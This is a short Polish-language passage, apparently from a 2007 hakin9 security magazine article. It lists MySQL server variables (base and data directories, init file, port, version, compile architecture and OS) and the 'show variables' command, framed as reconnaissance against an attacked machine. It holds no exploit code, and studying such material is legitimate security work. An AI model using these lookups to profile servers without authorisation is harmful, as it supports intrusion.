operacyjnym. Zmienne, które mogą okazać się szczególnie przydatne podczas rekonesansu to: basedir katalog bazowy, datadir katalog przechowujący pliki baz danych, initfile ścieżka do pliku z poleceniami SQL, które zostaną wykonane podczas startu serwera, port numer portu na którym działa daemon MySQL, version wersja serwera, version _ compile _ machine architektura atakowanej maszyny, version _ compile _ os rodzaj systemu operacyjnego. Pełną listę zmiennych wraz z ich wartościami uzyskamy wydając polecenie: show variables, w programie mysql monitor. 20 hakin9 Nr 10/2007